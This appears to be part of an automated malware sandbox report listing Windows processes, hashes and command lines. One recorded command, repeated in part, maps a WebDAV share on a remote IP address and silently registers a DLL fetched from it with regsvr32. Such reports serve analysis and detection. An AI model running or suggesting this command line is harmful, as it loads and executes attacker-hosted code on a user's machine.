          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:08:04:26
          Start date:02/01/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\244431861214697.dll
          Imagebase:0x7ff67f6d0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:08:04:26
          Start date:02/01/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:08:04:26
          Start date:02/01/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
          Imagebase:0x7ff67f6d0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:08:04:26
          Start date:02/01/2025
          Path:C:\Windows\System32\net.exe
          Wow64 process (32bit):false
          Commandline:net use \\193.143.1.231@8888\davwwwroot\
          Imagebase:0x7ff639ca0000
          File size:59'904 bytes
          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly